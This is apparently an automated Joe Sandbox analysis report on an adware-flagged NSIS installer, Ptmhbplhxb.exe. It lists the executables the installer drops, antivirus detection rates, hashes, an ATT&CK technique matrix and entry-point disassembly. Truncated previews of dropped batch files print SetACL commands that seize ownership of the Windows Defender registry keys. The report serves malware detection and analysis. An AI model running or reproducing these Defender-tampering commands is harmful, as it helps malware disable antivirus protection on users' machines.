| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Access Token Manipulation | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 2 Process Injection | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Scripting | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 2 Obfuscated Files or Information | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 3 4 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
Behavior Graph (rendered figure; text recovered from the graph):
  • Behavior Graph ID: 1284605, Sample: Ptmhbplhxb.exe, Start date: 02/08/2023, Architecture: WINDOWS, Score: 60
  • Signatures on the sample: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file
  • Ptmhbplhxb.exe started; dropped C:\Users\user\AppData\...\pdzaicbnewkzt.exe (PE32), C:\Users\user\AppData\...\gafvvkhmsfjamrm.exe (PE32), C:\Users\user\AppData\Local\...\SetACL64.exe (PE32+) and 4 other files (3 malicious); signature: Submitted sample is a known malware sample
  • Ptmhbplhxb.exe started cmd.exe; signature: Uses cmd line tools excessively to alter registry or file data
  • cmd.exe started conhost.exe, SetACL32.exe, SetACL32.exe and 37 other processes

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| Ptmhbplhxb.exe | 55% | ReversingLabs | Win32.Adware.Nemesis | |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe | 32% | ReversingLabs | Win32.PUA.Generic | |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe | 32% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun64.exe | 2% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun64.exe | 4% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL64.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL64.exe | 0% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\gafvvkhmsfjamrm.exe | 3% | ReversingLabs | Win32.Adware.Generic | |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\gafvvkhmsfjamrm.exe | 17% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\nsExec.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\nsExec.dll | 1% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe | 3% | ReversingLabs | Win32.Adware.Generic | |
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://helgeklein.com. | 0% | Virustotal | | Browse |
| https://helgeklein.com. | 0% | Avira URL Cloud | safe | |
No contacted domains info
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://nsis.sf.net/NSIS_Error | Ptmhbplhxb.exe | false | | high |
| http://nsis.sf.net/NSIS_ErrorError | Ptmhbplhxb.exe | false | | high |
| https://helgeklein.com. | SetACL32.exe, SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
| https://helgeklein.com | SetACL32.exe, SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | false | | high |
| https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe | SetACL32.exe, SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | false | | high |
          No contacted IP infos
Joe Sandbox Version: 38.0.0 Beryl
Analysis ID: 1284605
Start date and time: 2023-08-02 19:40:07 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Ptmhbplhxb.exe
Original Sample Name: 92189d2d76db2a5549f25e35a52a2451.exe
Detection: MAL
Classification: mal60.winEXE@143/12@0/0
EGA Information:
  • Successful, ratio: 50%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 97%)
  • Quality average: 85.4%
  • Quality standard deviation: 23.5%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 66
  • Number of non-executed functions: 139
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): Conhost.exe
  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
  • Not all processes were analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
          No simulations
          No context
          No context
          No context
          No context
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe | P196hUN2fw.exe | Get hash | malicious | Unknown | Browse | |
| C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe | LruEqu1rpq.exe | Get hash | malicious | Unknown | Browse | |
Process: C:\Users\user\Desktop\Ptmhbplhxb.exe
File Type: data
Category: dropped
Size (bytes): 2000000
Entropy (8bit): 7.999908296216761
Encrypted: true
SSDEEP: 49152:CYZIxXCEOcRkXc87PMpz8uru41xvnXqExZg+PuvsFztv:VZIx1OlX3Uzh7v6ExZTuEPv
MD5: F64C9DE8E8BB8D1761057E7E339C9A94
SHA1: F91049045B62DEB980BF7362B1AF9B9488EFDF38
SHA-256: B3E1685DF9F8C95EFE227AA0EDEDBFA22D7B40DCA8D0EAFE6C2D17D178416073
SHA-512: EB033FE3E8866F7E14E34DFF70B729C9130F5547D1AD7D3DECB569AC677CD7B727C073F99315EEBD5AC57E76EC3C07B503094538AC593EC44D6887B50761A4CC
Malicious: false
Process: C:\Users\user\Desktop\Ptmhbplhxb.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 794400
Entropy (8bit): 6.812760876754632
Encrypted: false
SSDEEP: 12288:XaWzgMg7v3qnCi9ErQohh0F4fCJ8lnyQQdbpSulVAbWjuixwhQaB/Q:qaHMv6CRrj3nyQQdpSulmWjxwhQaG
MD5: 71C7975385F73AE32B06F69DBE79290B
SHA1: 05A1197CB8BD88447199E42A75BFCF99E32F2C48
SHA-256: C0ABBEEA8AE726503BC5643F3471E378D92FCB59A37043062BBF9BA64D95004C
SHA-512: 1A6549788E97E5D07560F58DC11088424F0F90815F0CED2173BE169AD4DBF0E55CD19B40FBF8F65D65E0F6CADB21C0489DC6A8DE999859D12244879F4722EC95
Malicious: true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 32%
  • Antivirus: Virustotal, Detection: 32%, Browse
Joe Sandbox View:
  • Filename: P196hUN2fw.exe, Detection: malicious, Browse
  • Filename: LruEqu1rpq.exe, Detection: malicious, Browse
Process: C:\Users\user\Desktop\Ptmhbplhxb.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 945944
Entropy (8bit): 6.654096172451499
Encrypted: false
SSDEEP: 24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
MD5: EFE5769E37BA37CF4607CB9918639932
SHA1: F24CA204AF2237A714E8B41D54043DA7BBE5393B
SHA-256: 5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
SHA-512: 33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
Malicious: true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 2%
  • Antivirus: Virustotal, Detection: 4%, Browse
Process: C:\Users\user\Desktop\Ptmhbplhxb.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 526200
Entropy (8bit): 6.458888752002344
Encrypted: false
SSDEEP: 12288:dISQ0bSlUcGj4wJUWKk2cgLOKvlZeX8KDNqb3kE1+mQwxVqnz1gqntMeyNC5fmVa:SLvlUcoXoxqnz17nryM5fmVlZq
MD5: 93B828ED97CB2C701364DF520DDD5331
SHA1: CD8B4B8499D14A0E44DE3DC855AA5A8BA588E3D9
SHA-256: 9E2E0F10F6DDE0E19E441DEC7A6F14A813E5D39E9D7F70B2B48B88491F69BB9B
SHA-512: 86EF1CAF8102A119C239E62AF416AA07D85BDD0FA6815BEAB075A7B68DEC3F8DA293A309D915683010B6F7476F85EF38C9F5A8FF518B1F0A1EDB15884713B4B9
Malicious: true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
  • Antivirus: Virustotal, Detection: 0%, Browse
Process: C:\Users\user\Desktop\Ptmhbplhxb.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 616312
Entropy (8bit): 6.302197712270286
Encrypted: false
SSDEEP: 12288:3G2NBTh+l8gAqAbdsuEa3nZGSebY7o937bfJ9Ud:3xNBTYlaLdaynZGBc7orbJ9Ud
MD5: 1FB64FF73938F4A04E97E5E7BF3D618C
SHA1: AA0F7DB484D0C580533DEC0E9964A59588C3632B
SHA-256: 4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
SHA-512: DA6007847FFE724BD0B0ABE000B0DD5596E2146F4C52C8FE541A2BF5F5F2F5893DCCD53EF315206F46A9285DDBD766010B226873038CCAC7981192D8C9937ECE
Malicious: true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
  • Antivirus: Virustotal, Detection: 0%, Browse
Process: C:\Users\user\Desktop\Ptmhbplhxb.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 12739
Entropy (8bit): 5.177383295779892
Encrypted: false
SSDEEP: 192:pBoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6O:0+
MD5: 24E07246F0E8F5B0029AE7167B667ACE
SHA1: 63F61A2585FF45F17C168BE18164AFDD448773F2
SHA-256: 667E5C9CBE8D6D58E61A2628EBCBD6986D8701AC5670FDA668D999794F0EECF9
SHA-512: 0611BFB6815DDC8D881908BA39F956B21CA99179CF04DCABFDED3B5D98E13C9AFD11B35504DBB9956CBE8F685142ADF6AB5FBD1F3605C316903F4E631AB9DC8F
Malicious: false
Preview (CRLF line terminators, shown as ".." in the original, rendered as line breaks; the preview is truncated by the report):
    @echo off & title f & color 17
    cd %~dp0
    SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
    SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
    SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
    SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
    SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
    SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
    SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
    SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrato
Process: C:\Users\user\Desktop\Ptmhbplhxb.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 12767
Entropy (8bit): 5.189808508831073
Encrypted: false
SSDEEP: 192:lBoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6a:QK
MD5: 1ABF8067994181B1A38867BF6437F9D2
SHA1: D25E23848F65B85F0F21E9A0A69E4268B625ECA2
SHA-256: 23BBB732FF55AB62DC8863A69626EF5655F60BF0D7B96FA2818A895E81283B40
SHA-512: 6237826DE2FEAF63C2F1312680118474F9B60F5516A05E171743A09A088D7C9BFD06CE9DE17852E6F4C2DCB577814163621FF27B2A7BBB37F2A1AE130F64D882
Malicious: false
Preview (CRLF line terminators, shown as ".." in the original, rendered as line breaks; the preview is truncated by the report):
    @echo off & title f & color 17
    cd %~dp0
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrato
Process: C:\Users\user\Desktop\Ptmhbplhxb.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 5632
Entropy (8bit): 4.240862253741395
Encrypted: false
SSDEEP: 48:6DIo1LEbxpumam2O3qrkfy8Hgo+AMJpSrgCtWrNtnTwtLCctMlaqaRVm69FWSfbi:gZ1L5Pm2OarkfyBwptYNtTPGXzNt
MD5: B2DF99CF7A7B3239BDD77FD9A85A1D06
SHA1: D37FA95D10A9E17108BECB1E81B09326A6C3C7DE
SHA-256: D74ECE6000F3AFF6F08F127F5C7605A57F892B593C05A092498061D161A5A2E5
SHA-512: 42EBFB684E5F2BCCC982751791321FB6F929A9B73F0E317D3E61EEDB167B0D1DC953F9EC87C8C856C7B81D4FCE5AE6CEBEE45269C99364743B19F2DE2B1EB32A
Malicious: true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 3%
  • Antivirus: Virustotal, Detection: 17%, Browse
Process: C:\Users\user\Desktop\Ptmhbplhxb.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 309
Entropy (8bit): 5.021891252558085
Encrypted: false
SSDEEP: 6:TMVBd1IGMfVVa7VNQA1Q7VJdfEyFRfyrhAd+LWmtCluyyuQIm:TMHdGGsVazcrfyWd+hyyuxm
MD5: 99BC4155BE42BFF7FBACF63EE97390D9
SHA1: F26D90583E1027F4F277AC954CE0F8EAD5CDA388
SHA-256: 6420003143A560F7707D70B5027F54FE4AE3C8CB78E993977DFCD40E542DE61E
SHA-512: 82BC4F920A0B3B54C3DBF7F48269748C3099C48FD9B779E705A966255C71A804FB8BE6E36926976DCDD7076A920D26F6A0F79D22BD4941AE9D795256D9EE132C
Malicious: false
Preview (CRLF line terminators, shown as ".." in the original, rendered as line breaks):
    <?xml version="1.0" encoding="utf-8"?>
    <configuration>
     <startup> 
     
     <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup><system.net><defaultProxy useDefaultCredentials="true" /></system.net>
    </configuration>
Process: C:\Users\user\Desktop\Ptmhbplhxb.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 6656
Entropy (8bit): 4.994818958746835
Encrypted: false
SSDEEP: 96:f7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNPS3e:zXhHR0aTQN4gRHdMqJVgNPR
MD5: B38561661A7164E3BBB04EDC3718FE89
SHA1: F13C873C8DB121BA21244B1E9A457204360D543F
SHA-256: C2C88E4A32C734B0CB4AE507C1A9A1B417A2375079111FB1B35FAB23AEDD41D9
SHA-512: FEDCAAC20722DE3519382011CCF22314AF3EDCD11B69F814DB14710966853B69B9B5FC98383EDCDB64D050FF825264EABA27B1C5ADFE61D1FC9D77F13A052CED
Malicious: false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
  • Antivirus: Virustotal, Detection: 1%, Browse
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):5632
              Entropy (8bit):3.9224675212459275
              Encrypted:false
              SSDEEP:48:64i5+ozr+LWq4mswa2sMJLKY2LeCSAgjlA1aOCFFWSfbNtm:I5+ozrBq4tY2LgjsszNt
              MD5:935BA4EC020C33E5E8727AF55FDBFA36
              SHA1:9CE2633D2B58D410CCEF0BA027331906BA9C7E59
              SHA-256:2FB5D9D8ED4F8945609CE725C1E1286A2A3CE0ED711FD1C5217E440949C8B5D1
              SHA-512:9A98A8B86D4D253738336544E4BFD03001A4396559ACBE37A7098760D231857034BB894099B34ABF1B8981A30478EB492C3BC3D0CCCD7323A1751F6B911A09AD
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 3%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.............................*... ...@....@.. ....................................@..................................*..O....@..@....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................*......H.......p!..<............................................................0..........r...p(....rC..p(....ro..p(....(.....r...p(....r...p(.....(....&ro..p(....s..........(....r...p(....r...p(....rC..p(....ro..p(....r/..p.r...p.r...p(.......o.....r...p(........r...p.r...p(....(....+.r...p.r...p(....(....(....&.(....&*.0...........(.....s........o....*..(....*..BSJB............v2.0.50727......l...,...#~..........#Strings....L.......#US.P.......#GUID...`.......#Blob...........G...
              Process:C:\Users\user\Desktop\Ptmhbplhxb.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):239
              Entropy (8bit):5.021036233822738
              Encrypted:false
              SSDEEP:6:TMVBd1IGMfVVa7VNQA1Q7VJdfEyFRfyrhAW4QIm:TMHdGGsVazcrfyW3xm
              MD5:F2ECA2D00A9C69AF3E08C55DA5EC8299
              SHA1:5001564F3BFE5CDC60BDA5A14D8AF59105AB97DD
              SHA-256:6FC2543E8CD92F5DB9CAA385B64E5ABAB27D64D4F335B0E0F3A8FE8E87B8F181
              SHA-512:711072383DFB333A6C4ACE51E04C3FAA6B5D712533EEE0B2685DDBD00A45C4213203B62490A435E6F4AABD2F64319A25E71D0C6269E677F3B20EF90E7A98BFFC
              Malicious:false
              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. .. <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup>..</configuration>..
              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.99782737412941
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Ptmhbplhxb.exe
              File size:3'596'632 bytes
              MD5:92189d2d76db2a5549f25e35a52a2451
              SHA1:59708813a1744a959c35a0412f4bd2cae862ffa0
              SHA256:b9fdbe8b2868d78c2fbe632a82d102bf5b334b256d21565e3173ba8ebe169ba5
              SHA512:bfc96e69b59cb3fedeb8ff0675e2947e5fd26316e2a5157a1656299fd08170f231e9b2433d97027ab9058ad0156a46d18e4482d6db3a143a9a9137dd6b6e3765
              SSDEEP:98304:rZxnMDp/mW16XnaVn/tW5xZIx1OlX3Uzh7v6ExZTuEP7:rZZMD3wXajW76xIXkzhdf
              TLSH:4FF53302DA45D5FBE6B206B06621BEA8DFC9F401E3200717637C9DA6BB94AF4530D673
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...z..Y.................d...|.....
              Icon Hash:31cc06b2361e1918
              Entrypoint:0x4031f1
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x597FCC7A [Tue Aug 1 00:34:02 2017 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:3abe302b6d9a1256e6a915429af4ffd2
              Instruction
              sub esp, 00000184h
              push ebx
              push esi
              push edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 0040A198h
              mov dword ptr [esp+20h], ebx
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [004080A0h]
              call dword ptr [0040809Ch]
              and eax, BFFFFFFFh
              cmp ax, 00000006h
              mov dword ptr [0042F40Ch], eax
              je 00007FCE8CAEB013h
              push ebx
              call 00007FCE8CAEE0CAh
              cmp eax, ebx
              je 00007FCE8CAEB009h
              push 00000C00h
              call eax
              mov esi, 00408298h
              push esi
              call 00007FCE8CAEE046h
              push esi
              call dword ptr [00408098h]
              lea esi, dword ptr [esi+eax+01h]
              cmp byte ptr [esi], bl
              jne 00007FCE8CAEAFEDh
              push 0000000Ah
              call 00007FCE8CAEE09Eh
              push 00000008h
              call 00007FCE8CAEE097h
              push 00000006h
              mov dword ptr [0042F404h], eax
              call 00007FCE8CAEE08Bh
              cmp eax, ebx
              je 00007FCE8CAEB011h
              push 0000001Eh
              call eax
              test eax, eax
              je 00007FCE8CAEB009h
              or byte ptr [0042F40Fh], 00000040h
              push ebp
              call dword ptr [00408044h]
              push ebx
              call dword ptr [00408288h]
              mov dword ptr [0042F4D8h], eax
              push ebx
              lea eax, dword ptr [esp+38h]
              push 00000160h
              push eax
              push ebx
              push 00429830h
              call dword ptr [00408178h]
              push 0040A188h
              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804
               Name | Virtual Address | Virtual Size | Is in Section
               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8534 | 0xa0 | .rdata
               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4b000 | 0x42a8 | .rsrc
               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
